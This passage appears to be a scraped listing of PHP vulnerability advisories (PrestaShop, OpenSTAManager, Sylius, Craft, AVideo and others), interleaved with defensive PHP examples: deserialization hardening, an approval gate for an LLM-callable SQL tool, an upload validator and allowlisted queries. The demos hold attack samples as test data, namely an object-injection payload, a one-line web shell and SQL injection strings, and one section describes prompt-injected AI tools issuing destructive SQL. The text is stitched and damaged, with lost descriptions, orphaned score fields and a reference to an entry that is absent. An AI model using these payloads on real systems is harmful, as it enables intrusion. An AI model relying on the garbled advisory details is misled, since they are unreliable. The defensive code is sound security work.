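// 1. Vulnerable: whatever class the serialized string names gets instantiated.
function load_token_vulnerable(string $blob): mixed
{
    return unserialize($blob);
}

// 2. Hardened: objects are refused entirely. An embedded O:... decodes to
//    __PHP_Incomplete_Class (no destructor); treat that as an attack signal.
function load_token_no_objects(string $blob): array
{
    $value = @unserialize($blob, ['allowed_classes' => false]);
    if (!is_array($value) || contains_incomplete_class($value)) {
        throw new UnexpectedValueException('token is not a plain array');
    }
    return $value;
}
function contains_incomplete_class(array $v): bool
{
    foreach ($v as $item) {
        if ($item instanceof __PHP_Incomplete_Class) {
            return true;
        }
        if (is_array($item) && contains_incomplete_class($item)) {
            return true;
        }
    }
    return false;
}

// 3. Preferred for stored tokens: JSON (cannot create objects) plus an HMAC,
//    so a DB row altered via SQLi or leaked credentials fails verification.
function seal_token(array $token, string $key): string
{
    $json = json_encode($token, JSON_THROW_ON_ERROR);
    return base64_encode($json) . '.' . hash_hmac('sha256', $json, $key);
}
function open_token(string $sealed, string $key): array
{
    [$b64, $mac] = explode('.', $sealed, 2) + [null, null];
    $json = base64_decode((string) $b64, true);
    if ($json === false || $mac === null || !hash_equals(hash_hmac('sha256', $json, $key), $mac)) {
        throw new UnexpectedValueException('token failed authentication');
    }
    return json_decode($json, true, 512, JSON_THROW_ON_ERROR);
}

// --- constructed demo ---
$path = sys_get_temp_dir() . '/pwned.txt';
$data = "owned\n";
// Built by hand so no LogFlusher object (and no destructor) exists in this process.
$payload = sprintf('O:10:"LogFlusher":2:{s:4:"path";s:%d:"%s";s:4:"data";s:%d:"%s";}',
                   strlen($path), $path, strlen($data), $data);
// load_token_vulnerable($payload) would write $path when the object is freed.
try { load_token_no_objects($payload); } catch (UnexpectedValueException $e) { echo $e->getMessage(), "\n"; }

$key    = random_bytes(32);
$sealed = seal_token(['access_token' => 'abc', 'exp' => time() + 3600], $key);
print_r(open_token($sealed, $key));
try { open_token(substr($sealed, 0, -1) . 'x', $key); } catch (UnexpectedValueException $e) { echo $e->getMessage(), "\n"; }
```

`allowed_classes` is a mitigation, not a cure: a restricted list still instantiates those classes with attacker-chosen properties, and the unserializer itself has had memory-safety bugs. Where the data is a token, a config blob or a cache entry, a format that cannot express objects plus an integrity check removes the problem class rather than narrowing it.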
Source : NVD
## 7.2
Score
Published April 2, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.4
Wiz
CVE-2026-33673 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-33673 [HIGH] CVE-2026-33673 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33673 :
PHP vulnerability analysis and mitigation
PrestaShop is an open source e-commerce web application. Versions prior to 8.2.5 and 9.1.0 are vulnerable to stored Cross-Site Scripting (stored XSS) vulnerabilities in the BO. An attacker who can inject data into the database, via limited back-office access or a previously existing vulnerability, can exploit unprotected variables in back-office templates. Versions 8.2.5 and 9.1.0 contain a fix. No known workarounds are available.
Source : NVD
## 5.4
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 7.6
Affected Technologies
PHP
Prestashop
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11
Wiz
CVE-2026-32734 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-32734 [HIGH] CVE-2026-32734 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32734 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has DOM-based cross-site scripting in tag creation. This issue has been patched in version 5.2.3.
Source : NVD
## 6.1
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
NVD
Composer Severity HIGH Has Fix Added at: Apr 02, 2026
Wiz
CVE-2026-4175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4175 [MEDIUM] CVE-2026-4175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4175 :
PHP vulnerability analysis and mitigation
A vulnerability was determined in Aureus ERP up to 1.3.0-BETA2. The affected element is an unknown function of the file plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php of the component Chatter Message Handler. Executing a manipulation of the argument subject/body can lead to cross site scripting. The attack can be launched remotely. Upgrading to version 1.3.0-BETA1 is sufficient to fix this issue. This patch is called 2135ee7efff4090e70050b63015ab5e268760ec8. It is suggested to upgrade the affected component.
Source : NVD
## 5.1
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-35470 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35470 [MEDIUM] CVE-2026-35470 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35470 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2.
Source : NVD
## 8.8
Score
Published April 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Wiz
GHSA-898v-775g-777c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-898v-775g-777c Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-898v-775g-777c :
PHP vulnerability analysis and mitigation
## Impact
(Description not extracted; the surviving identifiers are `MySQLWriteTool`, `PDO::prepare()`, `execute()`, `DROP TABLE`, `TRUNCATE`, `DELETE` and `ALTER`.)
## Patches
Not patched in: 2.8.11
Recommended improvements (even if keeping the tool intentionally powerful):
- (Item partly lost; surviving identifiers: `insertRecord`, `updateRecord`, `INSERT`, `UPDATE`, `DROP/TRUNCATE/ALTER/GRANT`.)
- Add optional review workflow: log + require human approval for high-risk statements; or "dry-run" mode.
- Document strongly that the tool must not be exposed to untrusted prompts without additional safeguards.
## Workarounds
- (Item partly lost; surviving identifiers: `MySQLWriteTool`, `DROP`, `ALTER`, `GRANT`, `TRUNCATE`, `REVOKE`, `CREATE USER`.)
- Implement authorization gating for tool calls (RBAC, allow tool use only for trusted operators).
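A gate that implements the recommendations in the advisory above, as an added example that is not code from the advisory's project. A "write tool" an LLM can call is a confused-deputy problem: the model relays whatever SQL a prompt (or an injected document) asks for, and `PDO::prepare()`/`execute()` protect only against value injection, not against the statement itself being `DROP TABLE`. The class below lets only `INSERT`/`UPDATE` on an operator-approved set of tables run automatically, routes `DELETE` to a human-approval queue, refuses DDL/DCL and multi-statement strings outright, and requires a `WHERE` on `UPDATE`. Classification is deliberately lexical (leading keyword after comment stripping), which is why it refuses what it cannot classify rather than trying to understand it. Class, table and queue names are this example's assumptions; the demo uses SQLite in memory.

```php
<?php
declare(strict_types=1);

// Added example; not the advisory project's code.
final class GatedSqlWriter
{
    private const AUTO_OK        = ['INSERT', 'UPDATE'];
    private const NEEDS_APPROVAL = ['DELETE'];
    private const FORBIDDEN      = ['DROP', 'TRUNCATE', 'ALTER', 'GRANT', 'REVOKE', 'CREATE'];
    /** @var array<int,array{sql:string,params:array,reason:string}> */
    private array $approvalQueue = [];

    /** @param string[] $writableTables lower-case table names the tool may touch */
    public function __construct(private PDO $pdo, private array $writableTables) {}

    /** Strip comments, collapse whitespace and return the leading keyword, upper-cased. */
    private static function leadingKeyword(string $sql): string
    {
        $stripped = preg_replace(['~/\*.*?\*/~s', '~--[^\n]*~', '~#[^\n]*~'], '', $sql) ?? '';
        $stripped = trim(preg_replace('/\s+/', ' ', $stripped) ?? '');
        return strtoupper(strtok($stripped, ' (') ?: '');
    }

    /** Returns 'executed' or 'queued'; throws for anything the tool may not do. */
    public function run(string $sql, array $params = []): string
    {
        if (preg_match('/;\s*\S/', $sql)) {                       // anything after a ';'
            throw new InvalidArgumentException('multiple statements refused');
        }
        $kw = self::leadingKeyword($sql);
        if (in_array($kw, self::FORBIDDEN, true)) {
            throw new InvalidArgumentException("$kw is not available to the tool");
        }
        if (!preg_match('/\b(?:INTO|UPDATE|FROM)\s+`?([A-Za-z0-9_]+)`?/i', $sql, $m)
            || !in_array(strtolower($m[1]), $this->writableTables, true)) {
            throw new InvalidArgumentException('target table not in the writable set');
        }
        if (in_array($kw, self::NEEDS_APPROVAL, true) || !in_array($kw, self::AUTO_OK, true)) {
            // Logged and parked for a human; never executed from this call.
            $this->approvalQueue[] = ['sql' => $sql, 'params' => $params,
                                      'reason' => "$kw requires operator approval"];
            return 'queued';
        }
        if ($kw === 'UPDATE' && !preg_match('/\bWHERE\b/i', $sql)) {
            throw new InvalidArgumentException('UPDATE without WHERE refused');
        }
        $stmt = $this->pdo->prepare($sql);
        $stmt->execute($params);                                  // values still go through placeholders
        return 'executed';
    }

    public function pendingApprovals(): array
    {
        return $this->approvalQueue;
    }
}

// --- constructed demo ---
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT)');
$tool = new GatedSqlWriter($pdo, ['notes']);
echo $tool->run('INSERT INTO notes (body) VALUES (?)', ['hello']), "\n";   // executed
echo $tool->run('DELETE FROM notes WHERE id = ?', [1]), "\n";             // queued
foreach (['DROP TABLE notes',
          '/* harmless */ TRUNCATE notes',
          'INSERT INTO notes (body) VALUES ("a"); DROP TABLE notes',
          'UPDATE notes SET body = ?',
          'INSERT INTO users (name) VALUES (?)'] as $bad) {
    try {
        $tool->run($bad, ['x']);
    } catch (InvalidArgumentException $e) {
        echo "refused: {$e->getMessage()}\n";
    }
}
print_r($tool->pendingApprovals());
```

The database account the tool connects with should carry only `INSERT`/`UPDATE`/`DELETE` on the same table set, so the gate is defence in depth rather than the only control; and the gate's decision (including refusals) belongs in an audit log keyed to the conversation that produced the call, because the prompt that triggered a refused `DROP` is the incident, not the `DROP`.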
Source : NVD
## 9.4
Wiz
CVE-2026-34565 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34565 [CRITICAL] CVE-2026-34565 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34565 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Posts to navigation menus through the Menu Management functionality. Post-related data selected via the Posts section is stored server-side and rendered without proper output encoding. These stored values are later rendered unsafely within administrative dashboards and public-facing navigation menus, resulting in stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
Wiz
CVE-2025-14894 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-14894 [CRITICAL] CVE-2025-14894 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14894 :
PHP vulnerability analysis and mitigation
Livewire Filemanager, commonly used in Laravel applications, contains LivewireFilemanagerComponent.php, which does not perform file type and MIME validation, allowing for RCE through upload of a malicious php file that can then be executed via the /storage/ URL if a commonly performed setup process within Laravel applications has been completed.
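What an upload sink needs before anything is written under a web-served path, as an added example that is not Livewire Filemanager code: decide the type from the bytes (`finfo`), not from the client's MIME header or file name; map that type to a fixed extension; generate the stored name yourself; and keep the store outside the document root, or in one the web server never executes scripts from. The `$_FILES`-shaped arrays, the 1x1 PNG and the disguised PHP file are constructed for the demo; class name, limits and allowlist are this example's assumptions. Requires PHP 8.

```php
<?php
declare(strict_types=1);

// Added example, not Livewire Filemanager code.
final class UploadValidator
{
    /** sniffed MIME type => extension the stored file will get */
    private const ALLOWED = [
        'image/png'       => 'png',
        'image/jpeg'      => 'jpg',
        'image/gif'       => 'gif',
        'application/pdf' => 'pdf',
    ];
    private const MAX_BYTES = 5 * 1024 * 1024;

    public function __construct(private string $storeDir) {}

    /** @param array{tmp_name:string,size:int,error:int,name:string} $file */
    public function store(array $file): string
    {
        if ($file['error'] !== UPLOAD_ERR_OK) {
            throw new RuntimeException('upload error ' . $file['error']);
        }
        if ($file['size'] > self::MAX_BYTES || $file['size'] !== filesize($file['tmp_name'])) {
            throw new RuntimeException('size check failed');
        }
        // Content sniffing: PHP code named cat.png is text/x-php here, and a
        // polyglot that passes as image/png still gets a .png name and lands
        // where .png is never executed.
        $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
        $ext  = self::ALLOWED[$mime] ?? throw new RuntimeException("type not allowed: $mime");

        // The client-controlled name is used for nothing but logging.
        $stored = bin2hex(random_bytes(16)) . '.' . $ext;
        $target = rtrim($this->storeDir, '/') . '/' . $stored;
        // move_uploaded_file() refuses anything that is not a genuine upload;
        // copy() is the fallback only so this demo can run outside a request.
        $moved = is_uploaded_file($file['tmp_name'])
            ? move_uploaded_file($file['tmp_name'], $target)
            : copy($file['tmp_name'], $target);
        if (!$moved) {
            throw new RuntimeException('could not store file');
        }
        chmod($target, 0640);   // readable, never executable
        return $stored;
    }
}

// --- constructed demo: a real 1x1 PNG and a PHP file the client calls "shell.php" ---
$store = sys_get_temp_dir() . '/uploads-' . bin2hex(random_bytes(4));
mkdir($store, 0700);
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
));
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php system(\$_GET['c']);");

$v = new UploadValidator($store);
foreach ([$png, $php] as $tmp) {
    $f = ['tmp_name' => $tmp, 'size' => filesize($tmp), 'error' => UPLOAD_ERR_OK, 'name' => 'shell.php'];
    try {
        echo "stored as ", $v->store($f), "\n";
    } catch (RuntimeException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```

The advisory's "commonly performed setup" is the `storage:link` symlink that exposes the storage directory under `/storage/`; with it in place, serving uploads through a controller that sets `Content-Type` from the stored extension (and `X-Content-Type-Options: nosniff`), rather than letting the web server map URLs straight onto files, is what stops a stored file from ever being handed to the PHP handler.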
Source : NVD
## 9.8
Score
Published January 16, 2026
Severity CRITICAL
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
livewire-filemanager/filemanager
Sources
NVD
Wiz
CVE-2026-31825 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31825 [MEDIUM] CVE-2026-31825 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31825 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. Sylius API filters ProductPriceOrderFilter and TranslationOrderNameAndLocaleFilter pass user-supplied order direction values directly to Doctrine's orderBy() without validation. An attacker can inject arbitrary DQL. The issue is fixed in versions: 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, 1.14.18, 2.0.16, 2.1.12, 2.2.3 and above.
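The three SQL-injection entries above (Craft Commerce's `sort[0][direction]`/`sort[0][sortField]`, OpenSTAManager's `$_GET['righe']`, and this Sylius order-direction issue) are two different kinds of injection point, which is why they need two different fixes. As an added example that is not code from any of the three projects: a *value* (`righe`) goes through a placeholder; an *identifier or keyword* (a sort column, `ASC`/`DESC`) cannot be bound, so it is mapped through a fixed allowlist and anything else is refused. The class, table and column names are this example's assumptions, and the demo uses an in-memory SQLite table with constructed rows. Requires PHP 8.

```php
<?php
declare(strict_types=1);

// Added example, not Craft Commerce, OpenSTAManager or Sylius code.
final class InventoryQuery
{
    /** column name as the client sends it => column name as the SQL uses it */
    private const SORTABLE = [
        'sku'      => 'sku',
        'quantity' => 'quantity',
        'location' => 'location_id',
    ];
    private const DIRECTIONS = ['asc' => 'ASC', 'desc' => 'DESC'];

    public function __construct(private PDO $pdo) {}

    /**
     * @param int[]  $ids        row ids the client asked for (a value list)
     * @param string $sortField  client-supplied, untrusted
     * @param string $direction  client-supplied, untrusted
     */
    public function fetch(array $ids, string $sortField, string $direction): array
    {
        // Identifiers and keywords: allowlist lookup, never concatenation of raw input.
        $column = self::SORTABLE[$sortField]
            ?? throw new InvalidArgumentException("unsortable field: $sortField");
        $dir = self::DIRECTIONS[strtolower($direction)]
            ?? throw new InvalidArgumentException("bad direction: $direction");

        // Values: one placeholder per id, each coerced to int and bound as int.
        $ids = array_map('intval', $ids);
        if ($ids === []) {
            return [];
        }
        $placeholders = implode(',', array_fill(0, count($ids), '?'));
        $stmt = $this->pdo->prepare(
            "SELECT id, sku, quantity, location_id FROM inventory
             WHERE id IN ($placeholders) ORDER BY $column $dir"
        );
        foreach ($ids as $i => $id) {
            $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
        }
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

// --- constructed demo data ---
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE inventory (id INTEGER PRIMARY KEY, sku TEXT, quantity INTEGER, location_id INTEGER)');
$pdo->exec("INSERT INTO inventory VALUES (1,'A-100',5,2),(2,'B-200',12,1),(3,'C-300',0,2)");
$q = new InventoryQuery($pdo);

print_r($q->fetch([1, 2, 3], 'quantity', 'desc'));            // rows 2, 1, 3
print_r($q->fetch(['1) OR 1=1 --', 2], 'sku', 'asc'));        // the value is coerced to 1: rows 1, 2

// The identifier/keyword injections from the advisories fail closed before any SQL is built.
foreach ([['sku; DROP TABLE inventory', 'asc'], ['sku', 'DESC, (SELECT 1)']] as [$f, $d]) {
    try {
        $q->fetch([1], $f, $d);
    } catch (InvalidArgumentException $e) {
        echo "refused: {$e->getMessage()}\n";
    }
}
```

The same split applies to Doctrine's `orderBy()` and to Craft's `addOrderBy()`: both accept the string they are given, so the validation has to happen in the code that reads the request, and the allowlist should map request names to SQL names rather than passing even a validated request name straight through.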
Source : NVD
## 5.3
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sylius/syl
Wiz
CVE-2026-34247 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-34247 [MEDIUM] CVE-2026-34247 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34247 :
PHP vulnerability analysis and mitigation
(Description not extracted; the surviving identifiers are `plugin/Live/uploadPoster.php`, `live_schedule_id`, `User::isLogged()` and `socketLiveOFFCallback`.)
Source : NVD
## 5.4
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
Wiz
CVE-2026-25494 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-25494: PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the saveAsset GraphQL mutation uses filter_var(..., FILTER_VALIDATE_IP) to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services. This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 6.9
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-26987 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-26987: PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below are vulnerable to Reflected XSS attacks via email field. This issue has been fixed in version 26.2.0.
Source : NVD
## 5.3
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
librenms/librenms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 19, 2026
Wiz
CVE-2026-25523 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-25523: PHP vulnerability analysis and mitigation
Magento-lts is a long-term support alternative to Magento Community Edition (CE). Prior to version 20.16.1, the admin URL can be discovered without prior knowledge of its location by exploiting the X-Original-Url header on some configurations. This issue has been patched in version 20.16.1.
Source : NVD
## 5.3
Score
Published February 4, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openmage/magento-lts
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 04, 2026
Wiz
CVE-2026-33867 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
## CVE-2026-33867: PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions up to and including 26.0, AVideo allows content owners to password-protect individual videos. The video password is stored in the database in plaintext — no hashing, salting, or encryption is applied. If an attacker gains read access to the database (via SQL injection, a database backup, or misconfigured access controls), they obtain all video passwords in cleartext. Commit f2d68d2adbf73588ea61be2b781d93120a819e36 contains a patch.
Source : NVD
## 9.1
Score
Published March 27, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-34716 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.4
## CVE-2026-34716: PHP vulnerability analysis and mitigation
Source : NVD
## 6.4
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Apr 02, 2026
Wiz
CVE-2026-27568 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
## CVE-2026-27568: PHP vulnerability analysis and mitigation
Advisory references: `javascript:`
Source : NVD
## 5.1
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 21, 2026
Wiz
CVE-2026-33719 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
## CVE-2026-33719: PHP vulnerability analysis and mitigation
Advisory references: `plugin/CDN/status.json.php`, `plugin/CDN/disable.json.php`
Source : NVD
## 8.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
Wiz
CVE-2026-33478 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
## CVE-2026-33478: PHP vulnerability analysis and mitigation
Advisory references: `clones.json.php`, `cloneServer.json.php`, `cloneClient.json.php`
Source : NVD
## 10
Score
Published March 23, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 83.4
Exploitation Probability (EPSS) 2
Affected packages and libraries
avideo/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 21, 2026
Wiz
CVE-2025-67746 [LOW] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.3
## CVE-2025-67746: PHP vulnerability analysis and mitigation
Composer is a dependency manager for PHP. In versions on the 2.x branch prior to 2.2.26 and 2.9.3, attackers controlling remote sources that Composer downloads from might in some way inject ANSI control characters into the terminal output of various Composer commands, causing mangled output and potentially leading to confusion or DoS of the terminal application. There is no proven exploit and this thus has a low severity, but we still publish a CVE as it has potential for abuse, and we want to be on the safe side in informing users that they should upgrade. Versions 2.2.26 and 2.9.3 contain a patch for the issue.
Source : NVD
## 1.3
Score
Published December 30, 2025
Severity LOW
CNA Score 1.3
Affected Technologies
PHP
Wiz
CVE-2025-68129 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
## CVE-2025-68129: PHP vulnerability analysis and mitigation
Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens. Projects are affected if they use Auth0-PHP SDK versions between v8.0.0 and v8.17.0, or applications using the following SDKs that rely on the Auth0-PHP SDK versions between v8.0.0 and v8.17.0: Auth0/symfony versions between 5.0.0 and 5.5.0, Auth0/laravel-auth0 versions between 7.0.0 and 7.19.0, and/or Auth0/wordpress plugin versions between 5.0.0-BETA0 and 5.4.0. Auth0/Auth0-PHP version 8.18.0 contains a patch for the issue.
Source : NVD
## 7.5
Score
Wiz
CVE-2020-36947 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
## CVE-2020-36947: PHP vulnerability analysis and mitigation
LibreNMS 1.46 contains an authenticated SQL injection vulnerability in the MAC accounting graph endpoint that allows remote attackers to extract database information. Attackers can exploit the vulnerability by manipulating the 'sort' parameter with crafted SQL injection techniques to retrieve sensitive database contents through time-based blind SQL injection.
Source : NVD
## 7.1
Score
Published January 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
librenms/librenms
Sources
NVD
Wiz
CVE-2025-69215 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2025-69215: PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In version 2.9.8 and prior, there is a SQL Injection vulnerability in the Stampe Module. At time of publication, no known patch exists.
Source : NVD
## 8.7
Score
Published February 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11
Exploitation Probability (EPSS) N/A
Affected packages and libraries
devcode-it/openstamanager
Sources
NVD
Composer Severity HIGH No Fix Added at: Feb 04, 2026
Wiz
CVE-2026-27129 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
## CVE-2026-27129: PHP vulnerability analysis and mitigation
Advisory references: `gethostbyname()`
Source : NVD
## 5.7
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 5.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/cms
cpe:2.3:a:craftcms:craft_cms
Sources
Composer Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
Wiz
CVE-2026-33038 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
